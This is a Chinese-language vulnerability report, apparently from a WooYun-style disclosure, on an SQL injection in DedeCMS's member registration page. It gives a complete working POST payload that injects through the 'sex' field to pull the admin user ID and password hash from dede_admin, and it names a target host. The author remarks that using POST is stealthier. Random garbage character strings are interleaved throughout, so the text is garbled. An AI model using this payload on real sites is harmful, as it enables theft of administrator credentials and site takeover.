漏洞类型: SQL注射漏洞" I9 Q: w; `0 L, g! W
简要描述:' r+ E2 s) Y/ Y, ^6 K5 {0 P
% F7 {$ M6 l4 w; [需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.# J1 `( g! k$ i
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.; f4 {% y5 K. t) e1 K
详细说明:跟这个漏洞
# C* S2 e! R/ Q; a8 | {' C
1 q& T' D' y, l7 ^WooYun: Dedecms SQL注射导致审核机制绕过漏洞: ?# X% Z2 r' C+ n y/ B1 C+ L2 X5 C
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的." H, l% ]& ~ e4 `% X
POST提交以下数据,其实不用POST提交的,这样隐蔽点.2 }' ^ K5 o. i6 i
K4 l/ D$ y `& }9 X# z: Twww.political-security.com/member/reg_new.php' Q ~' d. L4 j
, T$ U+ E' R; U# _' i
POST
3 a6 W d; {$ T1 j" t
% D4 {; F3 `$ z% Odopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
- k I, A' J: p. E5 \- ~9 F1 ?( Tuserid=c4rp3nt3r&uname=c4rp3nt3r
3 o( s6 o' ~( J3 {8 ?. V+ m&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
0 p/ p& n3 }0 S6 \5 O" v( |&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
; K0 w. V' E( {* l7 v8 g. J(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
4 X5 Y" l: ?* B2 q% I%00&vdcode=glos&agree= |